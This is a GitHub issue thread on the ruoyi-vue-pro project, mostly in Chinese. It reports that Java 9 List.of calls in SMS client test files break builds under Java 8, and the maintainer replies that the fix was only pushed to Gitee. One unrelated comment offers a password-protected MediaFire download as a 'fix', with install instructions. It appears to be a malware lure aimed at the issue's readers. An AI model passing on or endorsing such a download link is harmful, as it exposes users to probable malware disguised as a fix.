### ISSUE TITLE
master分支混入了Java9的代码写法List.of

### ISSUE THREAD

**Issue by TurboQiang** [YunaiV/ruoyi-vue-pro#644]
### 基本信息

- ruoyi-vue-pro 版本：完整版， master分支， 提交记录：c2a50c4d9c00b760aeef35063d0a20bc8302d5f1
- 操作系统：MacOS
- 数据库：MySQL

### 你猜测可能的原因

我花费了 2-4 小时自查，发现可能的原因是：编译使用了Java9，未切换到Java8。

### 复现步骤

使用Java8本地编译时，**提示List.of报红**。且，全局搜索发现在AI模块中，有大量使用List.of创建的方式，只不过是没引入该模块，不会编译到，暂时没报红而已。

代码位置（以下三个类为新增文件）：
- cn/iocoder/yudao/module/system/framework/sms/core/client/impl/SmsClientTests.java:51
- cn/iocoder/yudao/module/system/framework/sms/core/client/impl/SmsClientTests.java:99
- cn/iocoder/yudao/module/system/framework/sms/core/client/impl/SmsClientTests.java:134

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by YunaiV** [comment]
= = 忘记推到 github 了。gitee 很早就推了
